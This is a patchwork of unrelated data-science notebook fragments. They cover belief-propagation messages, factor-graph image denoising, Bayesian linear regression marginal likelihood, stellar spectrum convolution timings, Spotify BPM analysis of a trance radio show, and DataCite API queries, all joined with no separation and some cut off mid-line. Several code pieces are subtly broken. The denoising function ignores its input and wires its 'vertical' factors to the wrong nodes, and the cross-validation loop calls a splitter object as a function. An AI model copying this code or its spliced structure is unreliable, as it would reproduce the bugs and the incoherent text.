influenza, message: [ 0.95 0.05] f2 -> smokes, message: [ 0.8 0.2] sorethroat -> f3, message: [ 1. 1.] fever -> f4, message: [ 1. 1.] coughing -> f6, message: [ 1. 1.] f3 -> influenza, message: [ 0.999 0.7 ] f4 -> influenza, message: [ 0.95 0.9 ] influenza -> f5, message: [ 0.9015975 0.0315 ] smokes -> f5, message: [ 0.8 0.2] f5 -> bronchitis, message: [ 0.72120587 0.12622365] f6 -> bronchitis, message: [ 0.93 0.8 ] bronchitis -> f7, message: [ 6.70721461e-07 1.00978920e-01] f7 -> wheezing, message: [ 0.04039157 0.06058735] Backward Pass wheezing -> f7, message: [ 1. 1.] f7 -> bronchitis, message: [ 0.999 0.6 ] bronchitis -> f5, message: [ 9.29070000e-07 4.80000000e-01] bronchitis -> f6, message: [ 7.20484666e-07 7.57341900e-02] f6 -> coughing, message: [ 0.01514684 0.06058735] f5 -> influenza, message: [ 0.0672 0.3456] f5 -> smokes, message: [ 0.013608 0[...]Part 3: Image Denoising and Loopy BPNext, we will use a loopy version of max-sum to perform denoising on a binary image. The model itself is discussed in Bishop 8.3.3, but we will use loopy max-sum instead of Iterative Conditional Modes as Bishop does.The following code creates some toy data: `im` is a quite large binary image and `test_im` is a smaller synthetic binary image. Noisy versions are also provided.from pylab import imread, gray # Load the image and binarize im = np.mean(imread('dalmatian1.png'), axis=2) > 0.5 imshow(im) gray() # Add some noise noise = np.random.rand(*im.shape) > 0.9 noise_im = np.logical_xor(noise, im) figure() imshow(noise_im) test_im = np.zeros((10,10)) #test_im[5:8, 3:8] = 1.0 #test_im[5,5] = 1.0 figure() imshow(test_im) # Add some noise noise = np.random.rand(*test_im.shape) > 0.9 noise_test_im = np.logical_xor(noise, test_im) figure() imshow(noise_test_im)3.1 Construct factor graph (10 points)Convert the Markov Random Field (Bishop, fig. 8.31) to a factor graph and instantiate it.from itertools import product # Define factor graph def image_factor_graph(im): # Observed variables im_x, im_y = im.shape observed = [[Variable('o-%d-%d'%(i,j),2 ) for i in range(im_y)] for j in range(im_x)] for i in range(im_x): for j in range(im_y): observed[i][j].set_observed(int(test_im[i,j])) # latent variables latent = [[Variable('l-%d-%d'%(i,j),2) for i in range(im_x)] for j in range(im_y)] # factors f = np.array([[0.9, 0.1],[0.1, 0.9]]) # X-Y factor factor_xy = [Factor('fxy-%d-%d'%(i,j), f, [observed[x][y], latent[x][y]]) for x,y in product(range(im_x), range(im_y))] # X-X horizontal factor_xh = [Factor('fxh-%d-%d'%(i,j), f, [latent[x][y], latent[x+1][y]]) for x,y in product(range(im_x-1), range(im_y))] # X-X vertical factor_xv = [Factor('fxv-%d-%d'%(i,j), f, [observed[x][y], latent[x][y+1]]) for x,y in product(range(im_x), range(im_y-1))] return observed, latent, factor_xy, factor_xh, factor_xv observed, latent, factor_xy, factor_xh, factor_xv = image_factor_graph(test_im)Marginal likelihood for Bayesian linear regressionAuthor: [](https://patel-zeel.github.io/), [](https://nipunbatra.github.io/) Bayesian linear regression is defined as below,\begin{align}\mathbf{y} &= X\boldsymbol{\theta} + \epsilon\\\epsilon &\sim \mathcal{N}(0, \sigma_n^2)\\\theta &\sim \mathcal{N}(\mathbf{m}_0, S_0)\end{align}For a Gaussian random variable $\mathbf{z} \sim \mathcal{N}(\boldsymbol{\mu}, \Sigma)$, $A\mathbf{z} + \mathbf{b}$ is also a Gaussian random variable.\begin{align}\mathbf{y} = X\mathbf{\theta} + \boldsymbol{\epsilon} &\sim \mathcal{N}(\boldsymbol{\mu}', \Sigma')\\\boldsymbol{\mu}' &= \mathbb{E}_{\theta, \epsilon}(X\mathbf{\theta}+\boldsymbol{\epsilon})\\ &= X\mathbb{E}(\mathbf{\theta}) + \mathbb{E}(\mathbf{\epsilon})\\ &= X\mathbf{m}_0\\ \\\Sigma' &= V(X\mathbf{\theta}+\boldsymbol{\epsilon})\\ &= XV(\mathbf{\theta})X^T+V(\boldsymbol{\epsilon})\\ &= XS_0X^T + \sigma_n^2I\end{align}Marginal likelihood is $p(\mathbf{y})$ so,\begin{align}p(\mathbf{y}) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma'|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{y}-\boldsymbol{\mu}')^T\Sigma'^{-1}(\mathbf{y}-\boldsymbol{\mu}')\right]\\ &= \frac{1}{(2\pi)^{\frac{N}{2}}|XS_0X^T + \sigma_n^2I|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{y}-X\mathbf{m}_0)^T(XS_0X^T + \sigma_n^2I)^{-1}(\mathbf{y}-X\mathbf{m}_0)\right]\end{align} Multiplication of two Gaussians (work in progress)We need Gaussian pdf over same variables to evaluate their multiplication. Let us convert $y$ into $\theta$. \begin{align}\mathbf{y} &= X\theta + \boldsymbol{\epsilon}\\\theta &= (X^TX)^{-1}X^T(\mathbf{y} - \boldsymbol{\epsilon})\\\text{Deriving mean and covariance of }\theta\\E(\theta) &= (X^TX)^{-1}X^T\mathbf{y}\\V(\theta) &= \sigma_n^2\left[(X^TX)^{-1}X^T\right]\left[(X^TX)^{-1}X^T\right]^T\\ &= \sigma_n^2(X^TX)^{-1}X^TX(X^TX)^{-1}\\ &= \sigma_n^2(X^TX)^{-1} \end{align}Now, we have both $p(\mathbf{y}|\boldsymbol{\theta})$ and $p(\boldsymbol{\theta})$ in terms of $\boldsymbol{\theta}$. We can apply the rules from 6.5.2 of MML book. Writing our results in terminology of 6.5.2. \begin{align}\mathcal{N}(x|a, A) &== \mathcal{N}(\theta|(X^TX)^{-1}X^T\mathbf{y}, \sigma_n^2(X^TX)^{-1})\\\mathcal{N}(x|b, B) &== \mathcal{N}(\theta|\mathbf{m}_0, S_0)\end{align}we know that,$$c\mathcal{N}(\theta|\mathbf{c}, C) = \mathcal{N}(x|a, A)\mathcal{N}(x|b, B)\\\mathcal{N}(\theta|\mathbf{c}, C) = \frac{\mathcal{N}(x|a, A)\mathcal{N}(x|b, B)}{c}$$In the Bayesian setting,\begin{align}Prior &\sim \mathcal{N}(x|b, B) == \mathcal{N}(\theta|\mathbf{m}_0, S_0)\\Likelihood &\sim \mathcal{N}(x|a, A) == \mathcal{N}(\theta|(X^TX)^{-1}X^T\mathbf{y}, \sigma_n^2(X^TX)^{-1})\\Posterior &\sim \mathcal{N}(\theta|\mathbf{c}, C) == \mathcal{N}(\theta|\mathbf{m}_n, S_n)\\\text{last but not the least}\\Marginal\;likelihood &\sim c == \mathcal{N}(\mathbf{y}|\boldsymbol{\mu}, \Sigma)\end{align}Let us evaluate the posterior,\begin{align}Posterior &\sim \mathcal{N}(\theta|\mathbf{c}, C)\\S_n = C &= (A^{-1} + B^{-1})^{-1}\\ &= \left(\frac{X^TX}{\sigma_n^2} + S_0^{-1}\right)^{-1}\\\mathbf{m_n} = \mathbf{c} &= C(A^{-1}a + B^{-1}b)\\ &= S_n\left(\frac{X^TX}{\sigma_n^2}(X^TX)^{-1}X^T\mathbf{y} + S_0^{-1}\mathbf{m}_0\right)\\ &= S_n\left(\frac{X^T\mathbf{y}}{\sigma_n^2} + S_0^{-1}\mathbf{m}_0\right)\end{align}Now, we evaluate the marginal likelihood,\begin{align}c &= \mathcal{N}(\mathbf{y}|\boldsymbol{\mu}, \Sigma)\\ &= (2\pi)^{-\frac{D}{2}}|A+B|^{-\frac{1}{2}}\exp\left(-\frac{1}{2}(a-b)^T(A+B)^{-1}(a-b)\right)\\ &= (2\pi)^{-\frac{D}{2}}|\sigma_n^2(X^TX)^{-1}+S_0|^{-\frac{1}{2}}\exp\left(-\frac{1}{2}((X^TX)^{-1}X^T\mathbf{y}-\mathbf{m}_0)^T(\sigma_n^2(X^TX)^{-1}+S_0)^{-1}((X^TX)^{-1}X^T\mathbf{y}-\mathbf{m}_0)\right)\end{align}Another well-known formulation of marginal likelihood is the following,$$p(\mathbf{y}) \sim \mathcal{N}(X\mathbf{m}_0, XS_0X^T + \sigma_n^2I)$$Let us verify if both are the same, empirically,import numpy as np import scipy.stats np.random.seed(0) def ML1(X, y, m0, S0, sigma_n): N = len(y) return scipy.stats.multivariate_normal.pdf(y.ravel(), (X@m0).squeeze(), X@S0@X.T + np.eye(N)*sigma_n**2) def ML2(X, y, m0, S0, sigma_n): D = len(m0) a = np.linalg.inv(X.T@X)@X.T@y b = m0 A = np.linalg.inv(X.T@X)*sigma_n**2 B = S0 return scipy.stats.multivariate_normal.pdf(a.ravel(), b.ravel(), A+B) def ML3(X, y, m0, S0, sigma_n): N = len(y) Sn = np.linalg.inv((X.T@X)/(sigma_n**2) + np.linalg.inv(S0)) Mn = Sn@((X.T@y)/(sigma_n**2) + np.linalg.inv(S0)@m0) LML = -0.5*N*np.log(2*np.pi) - 0.5*N*np.log(sigma_n**2) - 0.5*np.log(np.linalg.det(S0)/np.linalg.det(Sn)) - 0.5*(y.T@y)/sigma_n**2 + 0.5*(Mn.T@np.linalg.inv(Sn)@Mn) return np.exp(LML) X = np.random.rand(10,2) m0 = np.random.rand(2,1) s0 = np.random.rand(2,2) S0 = s0@s0.T sigma_n = 10 y = np.random.rand(10,1) ML1(X, y, m0, S0, sigma_n), ML2(X, y, m0, S0, sigma_n), ML3(X, y, m0, S0, sigma_n)Products of Gaussian PDFs (Work under progress) Product of two Gaussians $\mathbf{x} \sim \mathcal{N}(\boldsymbol{\mu}_0, \Sigma_0)$ and $\mathbf{x} \sim \mathcal{N}(\boldsymbol{\mu}_1, \Sigma_1)$ is an unnormalized Gaussian. \begin{align}f(\mathbf{x}) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_0)^T\Sigma_0^{-1}(\mathbf{x}-\boldsymbol{\mu}_0)\right]\\g(\mathbf{x}) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_1)^T\Sigma_1^{-1}(\mathbf{x}-\boldsymbol{\mu}_1)\right]\\\int h(x) = \frac{1}{c}\int f(\mathbf{x})g(\mathbf{x})d\mathbf{x} &= 1\end{align}We need to find figure out value of $c$ to solve the integration.\begin{align}h(x) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu})^T\Sigma^{-1}(\mathbf{x}-\boldsymbol{\mu})\right] = \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}\left(\mathbf{x}^T\Sigma^{-1}\mathbf{x} - 2\boldsymbol{\mu}^T\Sigma^{-1}\mathbf{x} + \boldsymbol{\mu}^T\Sigma^{-1}\boldsymbol{\mu}\right)\right]\\ f(x)g(x) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_0)^T\Sigma_0^{-1}(\mathbf{x}-\boldsymbol{\mu}_0) -\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_1)^T\Sigma_1^{-1}(\mathbf{x}-\boldsymbol{\mu}_1)\right]\\ &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}\left(\mathbf{x}^T(\Sigma_0^{-1}+\Sigma_1^{-1})\mathbf{x}- 2\boldsymbol{\mu}^T(\Sigma_0^{-1}+\Sigma_1^{-1})\mathbf{x} + \boldsymbol{\mu}^T(\Sigma_0^{-1}+\Sigma_1^{-1})\boldsymbol{\mu}\right)\right]\\\end{align} We can compare the exponent terms directly. We get the following results by doing that\begin{align}\Sigma^{-1} &= \Sigma_0^{-1} + \Sigma_1^{-1}\\\Sigma &= \left(\Sigma_0^{-1} + \Sigma_1^{-1}\right)^{-1}\\\\\boldsymbol{\mu}^T\Sigma^{-1}\mathbf{x} &= \boldsymbol{\mu_0}^T\Sigma_0^{-1}\mathbf{x} + \boldsymbol{\mu_1}^T\Sigma_1^{-1}\mathbf{x}\\\left(\boldsymbol{\mu}^T\Sigma^{-1}\right)\mathbf{x} &= \left(\boldsymbol{\mu_0}^T\Sigma_0^{-1} + \boldsymbol{\mu_1}^T\Sigma_1^{-1}\right)\mathbf{x}\\\boldsymbol{\mu}^T\Sigma^{-1} &= \boldsymbol{\mu_0}^T\Sigma_0^{-1} + \boldsymbol{\mu_1}^T\Sigma_1^{-1}\\\text{Applying transpose on both sides,}\\\Sigma^{-1}\boldsymbol{\mu} &= \Sigma_0^{-1}\boldsymbol{\mu}_0 + \Sigma_1^{-1}\boldsymbol{\mu}_1\\\boldsymbol{\mu} &= \Sigma\left(\Sigma_0^{-1}\boldsymbol{\mu}_0 + \Sigma_1^{-1}\boldsymbol{\mu}_1\right)\end{align} Now, solving for the normalizing constant $c$, \begin{align}\frac{c}{(2\pi)^{\frac{N}{2}}|\Sigma|^{\frac{1}{2}}} &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\\c &= \frac{|\Sigma|^{\frac{1}{2}}}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}|\Sigma_1|^{\frac{1}{2}}}\end{align} If we have two Gaussians $\mathcal{N}(\mathbf{a}, A)$ and $\mathcal{N}(\mathbf{b}, B)$ for same random variable $\mathbf{x}$, Marginal likelihood can be given as,$$c = (2\pi)^{-N/2}|A+B|^{-1/2}\exp -\frac{1}{2}\left[(\mathbf{a} - \mathbf{b})^T(A+B)^{-1}(\mathbf{a} - \mathbf{b})\right]$$Here, we have two Gaussians $\mathcal{N}(0, \sigma^2I)$ and $\mathcal{N}((X^TX)^{-1}X^T\mathbf{y}, \frac{(X^TX)^{-1}}{\sigma_n^2} )$ for same random variable $\boldsymbol{\theta}$, Marginal likelihood can be given as,$$$$import numpy as np import matplotlib.pyplot as plt import scipy.stats np.random.seed(0) N = 10 D = 5 sigma_n = 0.1 # noise sigma = 1 # variance in parameters m0 = np.random.rand(D) S0 = np.eye(D)*sigma**2 x = np.random.rand(N,D) theta = np.random.rand(D,1) y = x@theta + np.random.multivariate_normal(np.zeros(N), np.eye(N)*sigma_n**2, size=1).T plt.scatter(x[:,0], x[:,1], c=y) x.shape, theta.shape, y.shape a = np.linalg.inv(x.T@x)@x.T@y b = m0.reshape(-1,1) A = np.linalg.inv(x.T@x)/(sigma_n**2) B = S0 A_inv = np.linalg.inv(A) B_inv = np.linalg.inv(B) c_cov = np.linalg.inv(A_inv + B_inv) c_mean = c_cov@(A_inv@a + B_inv@b) a.shape, A.shape, b.shape, B.shape, c_mean.shape, c_cov.shape c_denom = 1/(((2*np.pi)**(D/2))*(np.linalg.det(c_cov)**0.5)) b_denom = 1/(((2*np.pi)**(D/2))*(np.linalg.det(B)**0.5)) a_denom = 1/(((2*np.pi)**(D/2))*(np.linalg.det(A)**0.5)) a_denom, b_denom, c_denom, 1/c_denom normalizer_c = (1/(((2*np.pi)**(D/2))*(np.linalg.det(A+B)**0.5)))*np.exp(-0.5*((a-b).T@np.linalg.inv(A+B)@(a-b))) norm_c_a_given_b = scipy.stats.multivariate_normal.pdf(a.squeeze(), b.squeeze(), A+B) norm_c_b_given_a = scipy.stats.multivariate_normal.pdf(b.squeeze(), a.squeeze(), A+B) normalizer_c, norm_c_a_given_b, norm_c_b_given_a, 1/normalizer_c a_pdf = scipy.stats.multivariate_normal.pdf(theta.squeeze(), a.squeeze(), A) b_pdf = scipy.stats.multivariate_normal.pdf(theta.squeeze(), b.squeeze(), B) c_pdf = scipy.stats.multivariate_normal.pdf(theta.squeeze(), c_mean.squeeze(), c_cov) a_pdf, b_pdf, c_pdf, np.allclose(a_pdf*b_pdf, normalizer_c*c_pdf) K = x@S0@x.T + np.eye(N)*sigma_n**2 marginal_Likelihood_closed_form = scipy.stats.multivariate_normal.pdf(y.squeeze(), (x@m0).squeeze(), K) marginal_Likelihood_closed_form, 1/normalizer_c from sklearn.model_selection import KFold from sklearn.linear_model import LinearRegression splitter = KFold(n_splits=100) for train_ind, test_ind in splitter(x): train_x, train_y = x[train_ind], y[train_ind] test_x, test_y = x[test_ind], y[test_ind] model = LinearRegression() model.fit(train_x, train_y)Convolution speed tests This Notebook compares the convolution speeds of Eniric to PyAstronomy. Enirics rotational convolution is faster than PyAstronomy's "slow" convolution but it is significantly slower than PyAstronomy's "fast" convoluions that use a fixed kernel (valid only for a small wavelength range) and require a uniform wavelength step.Eneric allows for a variable step wavelength array, with a unique kernel for each pixel (hence the longer time).Recalling a cached result is faster than PyAstronomy's convolutions.Requires PyAstronomy`pip install PyAstronomy`import matplotlib.pyplot as plt import numpy as np import PyAstronomy.pyasl as pyasl import eniric from eniric import config from eniric.broaden import rotational_convolution, resolution_convolution from eniric.utilities import band_limits, load_aces_spectrum, wav_selector from scripts.phoenix_precision import convolve_and_resample # config.cache["location"] = None # Disable caching for these tests config.cache["location"] = ".joblib" # Enable cachingLoad dataSelect test spectra, flux1 is a M0 spectra, flux2 is a M9 spectra.wav1, flux1 = load_aces_spectrum([3900, 4.5, 0.0, 0]) # wav2, flux2 = load_aces_spectrum([2600, 4.5, 0.0, 0]) wav1, flux1 = wav_selector(wav1, flux1, *band_limits("K")) # wav2, flux2 = wav_selector(wav2, flux2, *band_limits("K")) # PyAstronomy requires even spaced waelength (eniric does not) wav = np.linspace(wav1[0], wav1[-1], len(wav1)) flux1 = np.interp(wav, wav1, flux1) #flux2 = np.interp(wav, wav2, flux2) # Convolution settings epsilon = 0.6 vsini = 10.0 R = 40000Timing ConvolutionsTimes vary due to system hardware performance. Rotational convolution%%time rot_fast = pyasl.fastRotBroad(wav, flux1, epsilon, vsini) ## Wall time: 15.2 ms %%time rot_slow = pyasl.rotBroad(wav, flux1, epsilon, vsini) ## Wall time: 36 s # Convolution settings epsilon = 0.6 vsini = 10.0 R = 40000 %%time # After caching eniric_rot = rotational_convolution(wav, wav, flux1, vsini, epsilon=epsilon) ## Wall time: 4.2 msWall time: 62.5 msThe rotational convolution in eniric is ~10x faster thanthe precise version in Pyastronomy and does not require equal wavelength steps.It is ~1000x slower then the fast rotational convolution that uses a fixed kernel and only valid for short regions. Resolution convolution%%time res_fast = pyasl.instrBroadGaussFast(wav, flux1, R, maxsig=5) ## Wall time: 19.2 ms %%time # Before caching eniric_res = resolution_convolution( wavelength=wav, extended_wav=wav, extended_flux=flux1, R=R, fwhm_lim=5, num_procs=4, normalize=True, ) ## Wall time: 3.07 s %%time # Same calculation with cached result. eniric_res = resolution_convolution( wavelength=wav, extended_wav=wav, extended_flux=flux1, R=R, fwhm_lim=5, normalize=True, ) ## Wall time: 8.9 msWall time: 46.8 msResolution convolution is around 500x slower although it can handle uneven wavelenght spacing and has variable kernal. Compare the results of convolutionEniric gives a comparible rotational convolution to PyAstronomy's slow version. The PyAstronomy Fast convolution gives different results, which are maximum at the edges.PyAstronomy also has edge effects which are ignored using [10:-10] slicing.plt.plot(wav, flux1, label="Original Flux") plt.plot(wav[100:-100], eniric_res[100:-100], "-.", label="Eniric") plt.plot(wav[100:-100], res_fast[100:-100], "--", label="PyAstronomy Fast") plt.xlim([2.116, 2.118]) plt.xlabel("wavelength") plt.title("Resolution convolution R={}".format(R)) plt.legend() plt.show() plt.plot(wav, flux1, label="Original") plt.plot(wav, rot_fast, ":", label="PyAstronomy Fast") plt.plot(wav, rot_slow, "--", label="PyAstronomy Slow") plt.plot(wav, eniric_rot, "-.", label="Eniric") plt.xlabel("Wavelength") plt.title("Rotational Convolution vsini={}".format(vsini)) plt.xlim((2.116, 2.118)) plt.legend() plt.show() plt.plot( wav[100:-100], (eniric_rot[100:-100] - rot_fast[100:-100]) / eniric_rot[100:-100], label="Eniric - PyA Fast", ) plt.plot( wav[100:-100], (eniric_rot[100:-100] - rot_slow[100:-100]) / eniric_rot[100:-100], "--", label="Eniric - PyA Slow", ) plt.xlabel("Wavelength") plt.ylabel("Fractional difference") plt.title("Rotational Convolution Differenes") # plt.xlim((2.3, 2.31)) plt.legend() plt.show() plt.plot( wav[50:-50], (eniric_rot[50:-50] - rot_slow[50:-50]) / eniric_rot[50:-50], "--", label="Eniric - PyA Slow", ) plt.xlabel("Wavelength") plt.ylabel("Fractional difference") plt.title("Rotational Convolution Differenes") plt.legend() plt.show() assert np.allclose(eniric_rot[50:-50], rot_slow[50:-50])PyAstronomy slow and eniric are identical (within 1e-13%) (except for edge effects). PyAstronomy Fast and eniric are different by up to 1.5%plt.plot( wav[100:-100], (eniric_res[100:-100] - res_fast[100:-100]) / eniric_res[100:-100], label="(Eniric-PyA Fast)/Eniric", ) plt.xlabel("Wavelength") plt.ylabel("Fractional difference") plt.title("Resolution Convolution Differenes, R={}".format(R)) # plt.xlim((2.3, 2.31)) plt.legend() plt.show()Methodology> Explorations and explanations.- toc: false - badges: true- comments: false- categories: [asot, bpm]- image: images/methodology.png#hide import os import yaml import spotipy import json from spotipy.oauth2 import SpotifyClientCredentials with open('spotipy_credentials.yaml', 'r') as spotipy_credentials_file: credentials = yaml.safe_load(spotipy_credentials_file) os.environ["SPOTIPY_CLIENT_ID"] = credentials['spotipy_credentials']['spotipy_client_id'] os.environ["SPOTIPY_CLIENT_SECRET"] = credentials['spotipy_credentials']['spotipi_client_seret'] sp = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials())The Spotify Web API can return over a dozen [audio features for a track](https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/), notably `tempo` - "The overall estimated tempo of a track in beats per minute (BPM)."Given a Spotify ID, [Spotipy's `audio_features` method](https://spotipy.readthedocs.io/en/latest/?highlight=audio_featuresspotipy.client.Spotify.audio_features) can be called as follows:""" Artist: Above & Beyond, Track: Sun & Moon Track link: https://open.spotify.com/track/2CG1FmeprsyjgHIPNMYCf4 Track ID: 2CG1FmeprsyjgHIPNMYCf4 """ sun_and_moon_id = '2CG1FmeprsyjgHIPNMYCf4' audio_features = sp.audio_features(sun_and_moon_id) print(json.dumps(audio_features, indent=2))[ { "danceability": 0.691, "energy": 0.522, "key": 6, "loudness": -8.024, "mode": 0, "speechiness": 0.0908, "acousticness": 0.0216, "instrumentalness": 0.0141, "liveness": 0.125, "valence": 0.187, "tempo": 133.995, "type": "audio_features", "id": "2CG1FmeprsyjgHIPNMYCf4", "uri": "spotify:track:2CG1FmeprsyjgHIPNMYCf4", "track_href": "https://api.spotify.com/v1/tracks/2CG1FmeprsyjgHIPNMYCf4", "analysis_url": "https://api.spotify.com/v1/audio-analysis/2CG1FmeprsyjgHIPNMYCf4", "duration_ms": 326267, "time_signature": 4 } ]Nice! Looks like the "`tempo`", or BPM, of this track is around 133. Let's continue.Conveniently, the entire back catalogue of A State of Trance - 950+ episodes - has been uploaded to Spotify under the artist [" ASOT Radio"](https://open.spotify.com/artist/25mFVpuABa9GkGcj9eOPce). [Spotipy's `artist_albums` method](https://spotipy.readthedocs.io/en/2.12.0/?highlight=audio_featuresspotipy.client.Spotify.artist_albums) can list them for us, courtesy [spotipy/examples/artist_albums.py](https://github.com/plamere/spotipy/blob/2584d8cf5675ce877f773112a76d42fe36f8a1d1/examples/artist_albums.pyL29-L42):""" Artist: ASOT Radio Artist link: https://open.spotify.com/artist/25mFVpuABa9GkGcj9eOPce Artist ID: 25mFVpuABa9GkGcj9eOPce """ asot_radio_id = '25mFVpuABa9GkGcj9eOPce' albums = [] results = sp.artist_albums(asot_radio_id, album_type='album') albums.extend(results['items']) while results['next']: results = sp.next(results) albums.extend(results['items']) seen = set() # to avoid dups for album in albums: name = album['name'] if name not in seen: seen.add(name) albums.sort(key=lambda x: x['release_date']) # Sort by release dateCool, our list `albums` should now contain every episode of A State of Trance! Let's take a quick look..# Print the names of the first 10 episodes for album in albums[:10]: print(album['name'])A State Of Trance Episode 001 A State Of Trance Episode 003 A State Of Trance Episode 004 A State Of Trance Episode 005 A State Of Trance Episode 007 A State Of Trance Episode 008 A State Of Trance Episode 009 A State Of Trance Episode 010 A State Of Trance Episode 012 A State Of Trance Episode 015Hm, aren't we missing a few?# How many episodes? len(albums)For some reason 25 early episodes are classified as "Singles and EPs". Let's grab those as well, and add them to the list.""" Artist: ASOT Radio Artist link: https://open.spotify.com/artist/25mFVpuABa9GkGcj9eOPce Artist ID: 25mFVpuABa9GkGcj9eOPce """ asot_radio_id = '25mFVpuABa9GkGcj9eOPce' singles = [] results = sp.artist_albums(asot_radio_id, album_type='single') singles.extend(results['items']) while results['next']: results = sp.next(results) singles.extend(results['items']) seen = set() # to avoid dups for single in singles: name = single['name'] if name not in seen: seen.add(name) episodes = singles + albums episodes.sort(key=lambda x: x['release_date']) # Sort by release date for episode in episodes[:10]: print(episode['name'])A State Of Trance Episode 000 A State Of Trance Episode 001 A State Of Trance Episode 002 A State Of Trance Episode 003 A State Of Trance Episode 004 A State Of Trance Episode 005 A State Of Trance Episode 006 A State Of Trance Episode 007 A State Of Trance Episode 008 A State Of Trance Episode 009Nice!# Now how many episodes? len(episodes)Great, that's every available episode as of writing. Let's see what we can do with all this, starting with a tracklist courtesy of [Spotipy's `album_tracks` method](https://spotipy.readthedocs.io/en/latest/?highlight=audio_featuresspotipy.client.Spotify.album_tracks):# Print every available Artist - Track from ASOT 001 for track in sp.album_tracks(episodes[1]['uri'])['items']: print(track['artists'][0]['name'], '-', track['name']) - A State Of Trance [ASOT 001] - Intro Liquid DJ Team - Liquidation [ASOT 001] - Marco V Mix The Ultimate Seduction - The Ultimate Seduction [ASOT 001] **ASOT Radio Classic** - Original Mix System F - Exhale [ASOT 001] - Ferry Corsten & New Mix Rising Star - Clear Blue Moon [ASOT 001] - Original Mix Ralphie B - Massive [ASOT 001] - Original Mix Rank 1 - Such is Life [ASOT 001] - Original Mix - Blue Fear [ASOT 001] - Original Mix - A State Of Trance [ASOT 001] - OutroSeems most of the early episodes are missing a bunch of tracks unfortunately, [A State of Trance's website reports twice as many tracks in this episode](http://www.astateoftrance.com/episodes/episode-001/) and we'll want to remove the intro and outro as well.Looking at a more recent episode:# Print every available Artist - Track from ASOT 950 - Part 2 for track in sp.album_tracks(episodes[945]['uri'])['items']: track_artist = track['artists'][0]['name'] for artist in track['artists'][1:]: track_artist += " & " + artist['name'] print(track_artist, '-', track['name']) - A State Of Trance (ASOT 950 - Part 1) - Intro - Let The Music Guide You (ASOT 950 Anthem) [ASOT 950 - Part 1] - A State Of Trance (ASOT 950 - Part 1) - Coming Up, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - Service For Dreamers Special, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - ASOT 950 Event, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - Requested by & from Canada, Pt. 1 - A State Of Trance (ASOT 950 - Part 1) - Requested by & from Canada, Pt. 2 Tritonal & Jeza - I Can Breathe (ASOT 950 - Part 1) - Tritonal Club Mix - A State Of Trance (ASOT 950 - Part 1) - Requested by from Romania Super8 & Tab - Nino (ASOT 950 - Part 1) - A State Of Trance (ASOT 950 - Part 1) - Requested by from Portugal & & Underworld & Ar[...]The more recent episodes feature a Spotify exclusive - voiceover interludes! Seems they all contain "A State of Trance" though, same with the regular intros and outros.Without them:# Print every available Artist - Track from ASOT 950 - Part 2 (actual songs only) episode_tracks = sp.album_tracks(episodes[945]['uri'])['items'] pruned_tracks = [] for track in episode_tracks: if "a state of trance" in track['name'].lower() or "- interview" in track['name'].lower(): continue else: pruned_tracks.append(track) track_artist = track['artists'][0]['name'] for artist in track['artists'][1:]: track_artist += " & " + artist['name'] print(track_artist, '-', track['name']) - Let The Music Guide You (ASOT 950 Anthem) [ASOT 950 - Part 1] Tritonal & Jeza - I Can Breathe (ASOT 950 - Part 1) - Tritonal Club Mix Super8 & Tab - Nino (ASOT 950 - Part 1) & & Underworld & - Downpipe (ASOT 950 - Part 1) - Remix - Chordplay (ASOT 950 - Part 1) & & & - In And Out Of Love (ASOT 950 - Part 1) - ilan Bluestone & Assaf & - All Of You (ASOT 950 - Part 1) & - Made Of Love (ASOT 950 - Part 1) Eco - A Million Sounds, A Thousand Smiles (ASOT 950 - Part 1) Dennis Sheperd & Cold Blue & Ana Criado - Fallen Angel (ASOT 950 - Part 1) - Dennis Sheperd Club Mix Omnia & Everything By Electricity - Bones (ASOT 950 - Part 1) - The Train (ASOT 950 - Part 1) & Shapov - The Last Dancer (ASOT 950 - Part 1) HALIENE & - Dream In Color (ASOT 95[...]Much better! Finally, for fun, let's track this episode's BPM over time using some visualization libraries:import altair as alt import numpy as np import pandas as pd bpm = [] for track in pruned_tracks: bpm.append(sp.audio_features(track['uri'])[0]['tempo']) x = np.arange(len(pruned_tracks)) source = pd.DataFrame({ 'track': x, 'bpm': np.array(bpm) }) alt.Chart(source).mark_line().encode( alt.X('track'), alt.Y('bpm', scale=alt.Scale(domain=(120, 150))), ).properties( title="ASOT 950 Part 2 - BPM of track" )Exploration Notebook to Compare USGS DOI Tool API to DataCite APIPlease be sure to review the other notebook in the GitHub repo before working with this notebook.# https://support.datacite.org/docs/api-queries import requests import json import pprint # Queries by default search all fields, but a specific field can be provided in the query. data_cite_query = requests.get('https://api.datacite.org/dois?query=10.5066') json_data = json.loads(data_cite_query.text) for iDOI in json_data['data']: pprint.pprint(iDOI) data_cite_query = requests.get('https://api.datacite.org/dois?provider-id=usgs') data_cite_query.textCompare response from DataCite to USGS DOI tool DataCite API#Not caps senstive, note available fields datacite_query = 